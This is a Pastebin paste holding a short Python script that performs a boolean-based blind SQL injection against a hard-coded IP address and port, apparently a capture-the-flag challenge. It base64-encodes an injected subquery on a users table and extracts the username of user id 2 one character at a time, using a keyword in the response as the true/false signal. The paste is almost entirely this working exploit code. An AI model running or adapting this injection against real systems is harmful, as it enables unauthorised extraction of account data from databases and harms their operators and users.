Advertisement
Guest User

Untitled

a guest
Mar 3rd, 2018
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.66 KB | None | 0 0
  1. import requests, base64, sys
  2. base = ""
  3. symbols = """qwertyuiopasdfghjklzxcvbnm1234567890{}QWERTYUIOPASDFGHJKLZXCVBNM!@#$%^&*()_+;'/.,[]:"?><"""
  4. def func(litera):
  5. string = """%' and `id`='1' and (select username from users where `id`='2') like '{}%""".format(base + litera)
  6. string = base64.b64encode(string.encode('ascii')).decode('ascii')
  7.  
  8. r = requests.post('http://128.199.224.175:24000/', data = {'spy_name':string})
  9. if r.text.find('Alix') != -1:
  10. print("Found:", litera)
  11. return True
  12. while True:
  13. for x in symbols:
  14. if func(x):
  15. base += x
  16. print(base)
  17. break
  18. print(x)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement